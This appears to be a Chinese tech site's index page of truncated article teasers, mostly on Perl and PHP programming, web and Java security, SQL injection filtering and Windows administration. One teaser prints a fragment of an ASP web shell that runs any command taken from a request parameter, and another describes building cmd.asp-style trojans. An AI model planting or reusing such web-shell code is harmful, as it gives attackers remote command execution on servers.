FreeXploiT

                    Windows的自启动方式    这篇文章断断续续写了有一年，在有些论坛也曾经贴过，读者的回复是两种， 一是不错，二是抄袭。但是我可以保证所有的内容是我个人查阅的资料（包括大脑）和进行试验与思考的结果。如果这也算抄袭，那么我只好苦笑了。 参考的资料名称可以看目录。 如果有人来所取索取doc版本，来封信，我会mail给大家，呵呵。mailto:sn

PERL连接ACCESS数据库 前题是必须安装好activeperl （505以上），以及MS Access 97 一. 安装Win32-ODBC模块 步骤1： 从TOOLS栏目中下载Win32-ODBC.zip,下载完后用winzip解开到一个temp目录,共有三个文件： Readme Win32-ODBC.ppd Win32-ODBC.tar.gz 步骤2： 在DOS窗口下，temp目录中运行

指令：print语法：print Filehandle LIST说明：这个Filehandle可以看作在I(INPUT)/O(OUTPUT)之间的一个桥梁,可以利用FILEHANDLE来做出数据读入写 出的动作.STDIN是代表从哪连输入数据,例如从电脑的键盘输入;STDOUT是代表从哪连输出数据;例如从电脑的屏 幕输出;STDERR是代表从哪连输出错误的数据,例如从电脑的屏幕输出.而在PERL语

 用 Sysopen()进行更多的控制 -------------------------------------------------------------------------------- 为了更好的控制文件的打开方式，可以使用 sysopen() 函数： use Fcntl; sysopen(FH, $filename, O_RDWR|O_CREAT, 0666) or die

 读入多个记录 如果你调用，返回文件中剩余的记录。如果你处于文件尾，则返回空表： @records = ; if (@records) { print "There were ", scalar(@records), " records read.n"; } 在下面的一步中，进行赋值和测试两项工作： if (@records = ) { print "There were ", scalar(

说到SQL注入机，从娃娃针对动网文章的dvTxt.pl到臭要饭的绝世猜解CSC、NB联盟的NBSI，大家也都用过吧？开天始祖dvTxt.pl，也不知被改了多少遍，以用于针对各种不同的有SQL注入漏洞的系统，通常《黑防》的一篇《**存在SQL注入漏洞》的文章，末了，都要把这尊大佛抬出来，更改几个字段，然后，又一个**专杀工具出土了！对于臭要饭的绝世猜解CSC，我用得已经是忍无可忍了， 虽然采用了多线

 深入研究表单提交方式:GET/POSTHackfan本文平台：Windows 2000 Professional + Apache 1.3.17 + Perl 5.6.1 + Internet Explorer 5.00.2920.0000　　大家知道目前表单提交的方式有GET和POST。我在这里不多说什么，给大家看一个以GET方式提交的表单的请求：GET /cgi-bin/

对于无扩展名的PHP程序的研究作者：PHP环境：WinXp Pro + Apache 2.0.49 + PHP 4.3.5 (Module)　　将没有扩展名的PHP代码，给PHP解释器解释，好处在于大大增加了安全性，给入侵的人、盗链的人，增加了迷惑性。例如：http://www.msger.net/chat?username=Hackfanhttp://www.msger.net/im

 近日在优快云的CGI版看到有centuries (燃烧太阳)网友问如何在Perl中内嵌HTML，这是在Perl WEB开发中经常遇到的一个问题，现在写出来，希望对大家有所帮助。问我现在有一个html的网页代码，要将其改为perl程序，如果只是单纯在其第一行加上"#!../perl/bin/perl",并将文件后缀名改为.cgi，会出现错误提示"You dont h

终于可以拿到这本大作了。正是由于翻过第二版，因此毫不犹豫的上网购买了这本小骆驼书。不过刚拿到的时候一直怀疑是不是定错书了，因为第二版第一章写的非常漂亮，把一个简单的例子渐渐扩大，最后到一个1，2百行的程序。非常引入入胜，这次想重温却没有机会了。第一章作者完全是在讲一些perl的相关知识。只在最后列出了一个5行的小例子。虽然感觉骤然下降，不过对perl的热情不减，还是需要从头好好看看书来学，而不想每

 第二章 标量数据Perl中的标量表示的范围很大，包括数字和字符/字符串。而且数字也不像c中有浮点数，单精，双精，整数...之分，只要是数字就是标量。而且所有的数字其内部格式都一样，perl将整数保存为浮点数，计算也是按照浮点数进行计算。 数字的表示方法：（在这方面还是可以看出perl的随意性）1.25255.0007.25e45-6.5e24-12e-24-1.2E-230-4061

 《Perl语言入门》自学笔记－－第三章 1主要是一些数组和列表的介绍和技巧，从中可以充分感受到perl的方便和强大：）数组方面：1. 数组是从0开始计数的。2. 求最后一个元素的索引值：$#rocks3. 简单的求最后一个数的值：rocks[-1] 区间操作符来表示列表直接量：(1..5): 表示1,2,3,4,5(1.7..5.7): 表示1,2,3

 指令:# 说明:注解符号Remark宣告 范例:#本程序是一个示范注解说明 -------------------------------------------------------------------------指令:print 语法一:print Filehandle LIST 说明:这个Filehandle可把它看作在I(Input)/O(Output)间的一个桥梁,可以利

来源:PHP动力在线 1 前言    PHP被大量的应用于Web的后台CGI开发，通常是在用户数据数据之后得出某种结果，但是如果用户输入的数据不正确，就会出现问题，比如说某人的生日是"2月30日"！那应该怎么样来检验暑假是否正确呢？ 在PHP中加入了正则表达式的支持，让我们可以十分方便的进行数据匹配。 2 什么是正则表达式：    简单的说，正则表达式是一种可以用于模式匹配和替换的强大工具。在几乎

多方协议 方便查阅www.networkdictionary.comhttp://www.networkdictionary.com/chinese/protocols/

第三部分：创建更安全的网络程序 概论：创建一个安全的网络程序，你需要考虑很多技术以外的东西。一个安全的解决方案除了前面讲到的虚拟机安全，应用程序安全外，还依赖于你对网络环境的理解以及程序使用者（包括那些居心叵测的用户）的使用技能。在这第三部分，Todd Sundsted安全讨论的最后一部分，他探究了这些问题并最后给出了解决方案。 在这个安全系列讲解中，我一直鼓励你从三个不同方面来考察JAVA安全问

第一部分：Java的安全基础——虚拟机和字节码安全 概论：安全问题对很多数人来说都非常重要。从其历史看，Java安全主要意味着虚拟机和字节码安全。然而这个看法忽略了两个重要方面—应用程序和网络安全。在下面一系列文章中，Todd Sundsted讲解了JAVA虚拟机安全，应用程序安全，网络安全，解释了应该采取什么样的措施来全面巩固你的Java安全。在这第一部分，他向我们解释了Java安全的基础：虚拟

一、概述 当网络编程越来越方便，系统功能越来越强大，安全性却指数倍地下降。这恐怕就是网络编程的不幸和悲哀了。各种动态内容生成环境繁荣了WWW，它们的设计目标就是为了给开发者更多的力量，给最终用户更多的方便。正因为如此，系统设计师和开发者必须明确地把安全问题作为一个考虑因素，事后追悔很难奏效。 从安全的角度来看，服务器端WWW应用的弱点来源于各种各样的交互能力和传输通道。它们是攻击者直接

一、令人疑惑的过滤方式 典型例子是不管不顾地对所有的输入变量都去掉单引号，或者是把单引号替换成合法的两个单引号，例如： id = replace(request.querystring("id"), "", "") str = replace(request("someinput"), "", "") 现在很明了的是，第一个做法很有可能是错误的。因为引起SQL Injection的不总是单

Web的大多数安全问题都属于下面三种类型之一 ： 1. 服务器向公众提供了不应该提供的服务。 2. 服务器把本应私有的数据放到了公开访问的区域。 3.　服务器信赖了来自不可信赖数据源的数据。 　　 显然，许多服务器管理员从来没有从另一个角度来看看他们的服务器，例如使用端口扫描程序。如果他们曾经这样做了，就不会在自己的系统上运行那么多的服务，而这些服务原本无需在正式提供Web服务的机器上运行，或者这

一、 介绍 只要在 php.ini 文件中激活了 allow_url_fopen 选项，您可以在大多数需要用文件名作为参数的函数中使用 HTTP 和 FTP URL 来代替文件名。同时，您也可以在 include()、include_once()、require() 及 require_once() 语句中使用 URL。PHP 所支持协议的更多信息参见 附录 J。 注: 要在 PHP

下面是源代码 src/main/http_request.c: 的处理请求的代码： static void process_request_internal(request_rec *r) { int access_status; /* Ignore embedded %2Fs in path for proxy requests */ if (r->proxyreq == NOT_PROXY

第二部分：不要让漏洞危及应用程序安全 概论：在这个部分的安全讨论中，Todd Sundsted和我们一起讨论应用程序安全问题。在程序开发中的微小错误都可能给开发人员和用户带来很大的安全问题。Todd在这里将展示如何设计及实现这种最普通的安全漏洞类型，并描述了如何避免这些问题。他还提供了一个来自Sun自己JDK中的一个漏洞示列。 大多数软件开发人员都能意识到那些恶意或是仅仅是好奇的黑客所带来的威胁，

一、不能盲目相信用户输入 　　在Web应用开发中，开发者最大的失误往往是无条件地信任用户输入，假定用户（即使是恶意用户）总是受到浏览器的限制，总是通过浏览器和服务器交互，从而打开了攻击Web应用的大门。实际上，黑客们攻击和操作Web网站的工具很多，根本不必局限于浏览器，从最低级的字符模式的原始界面（例如telnet），到CGI脚本扫描器、Web代理、Web应用扫描器，恶意用户可能采用的攻击模式和手

●其它错误 此外，还有一些其它难以归类的错误，如“非1即0”导致绕过认证的问题。 9.2.3　 常用的的CGI漏洞检测工具 1.Twwwscan 这个工具速度比较快，而且可以利用参数把windows系统和unix系统分开扫描，不使用图形界面，比较简单些； 2.Cis 是个图形化的小巧扫描工具，主要是针对windows系统设计，对检查出来的CGI问题有比较详细的描述，利于使用、分析和解决漏洞； 3.

解决方法： (1) 为你的数据库文件名称起个复杂的非常规的名字，并把他放在几层目录下。所谓“非常规”，打个比方：比如有个数据库要保存的是有关书籍的信息，可不要把它命名为”book.mdb“的名字，起个怪怪的名称，比如d34ksfslf.mdb，再把他放在如./kdslf/i44/studi/ 的几层目录下，这样黑客要想通过猜的方式得到你的Access数据库文件就难上加难了； (2)不要把数据库名写

1.如何使得apache监听在特定的端口 　　 　　修改httpd.conf里面关于Listen的选项，例如： 　　Listen 8000 　　是使apache监听在8000端口 　　而如果要同时指定监听端口和监听地址，可以使用： 　　Listen 192.170.2.1:80 　　Listen 192.170.2.5:8000 　　这样就使得apache同时监听在192.170.2.1的80端口

修正时间 2006-06-04--------------------- 1、“有毒”的NULL字符 --------------------- 　　如果我说："root"=="root"，相信没有什么人反对。但同时我也这样说： "root"!="root"！还有多少人会认为我是个“正常人”？:) 　　但在各种不同的编程语言中，确实存在着这种情况。 　　对于每一个希望发现CGI漏洞的安全专家或

函数很简单， 主要是针对字符串和数字两种类型的传入数据分别进行了处理，具体用法：字符类型的strUsername = CheckInput(Request(“username“),“s“)数字类型的ID = CheckInput(Request(“id“),“i“)下面是函数Function CheckInput(str,strType)   函数功能：过滤字符参数中的单引号，对于数字参数进行判

本文作者：lcx文章出处：未知文章性质：原创阅读次数：28发布日期：2004-10-24  end if %> if request("cmdx")="cmd.exe地址，可更改可默认" then response.write oScriptlhn.exec("cmd.exe /c"&request("cmd")).stdout.readall end i

cmd.asp木马大家一定用过吧。这是一个可以执行cmd命令的asp文件（不过要被杀毒软件追杀^_^）。其原理是用WSCRIPT.SHELL对象调用cmd.exe，然后把返回的信息放到一个临时文件，再利用FSO把临时文件信息读出来显示在浏览器里。 呵呵，在asp.net环境下也是可以写出类似程序的。不过可以不用那些对象。 VB.net里有一个shell函数，可以执行外部程序。呵呵，就是利用

请保留此信息: 稻香老农制作, Sunrise_Chen修改dim upfile_5xSoft_StreamClass upload_5xSoftdim Form,File,Versi

Michael HowardMicrosoft Corporation2002 年 6 月 14 日安全领域存在这样一种观点：执行某项任务只要有刚好足够的权限就可以了。为什么是这样呢？还是让我从一个小故事讲起吧。几年前，我在一家大银行从事安全咨询和编程工作。上班第一天，我惊讶地发现我的帐户竟然是域管理员组的成员。我询问为什么我是域管理员时，负责我工作的主管告诉我，因为我将要开发应用程序，而

概要Microsoft Windows 和 Windows 应用程序使用动态链接库 (DLL) 执行功能，例如注册和注销（DllRegisterServer、DllUnregisterServer）或者在内存中加载和卸载（DllGetClassObject、DllCanUnloadNow）对象、进程和数据等。本文将讨论动态链接、入口点、依赖性、动态库与静态库的区别、DLL 问题和故障排除。

Windows 可能在 Boot.ini 文件中使用 Signature() 语法 概要在安装 Windows 之后，您可能注意到在 Boot.ini 文件中高级 RISC 计算 (ARC) 路径项以"signature()"语法开头。例如： signature(8b467c12)disk(1)rdisk(0)partition(2)/winnt="description"仅当

======================================= Bill Gates写的QBasic程序(1981-1982) (老古董了。没准它的年纪不比你小!     ：) 文件名: DONKEYQB.BAS 运行: QBasic /RUN DonkeyQB.BAS=======================================     RE

主题 怎么才能关掉一个用任器关不了的进程？ « 上一主题 | 下一主题 »hkfiyon 发表于：2004-11-17 23:58 回复发帖： 10积分： 0注册： 2004-10-31怎么才能关掉一个用任务管理器关不了的进程？我前段时间发现我的机子里多了一个进程，只要开机就在，我用任务管理器却怎么关也关不了，大家帮忙呀！

如何超越Windows2000赋予的ADMINISTRATOR权限！虽然Admin权利大，但不是最大NT的安全组件里有一个叫Local Security Authority Protected Subsystem.当我们以ADMINISTRATOR登陆时,系统根据缺省的授权,赋予ADMINISTRATOR16个授权.下面乃是详细的清单.SeChangeNotifyPrivilegeSeSecuri

在ASP中实现页面与数据库连接的几种实用方法褚忠孝  续晓龙  （乌鲁木齐陆军学院战斗实验室  830002）摘要：该文讨论在ASP中页面与数据库连接的几种实用方法，最后给出一个利用该文提供的函数存取SQL Server数据库的例子，对开发网络自动化系统有重要的实际意义。关键词：ASP  数据库  连接在Internet网上随处可见留言板、讨论组、网上投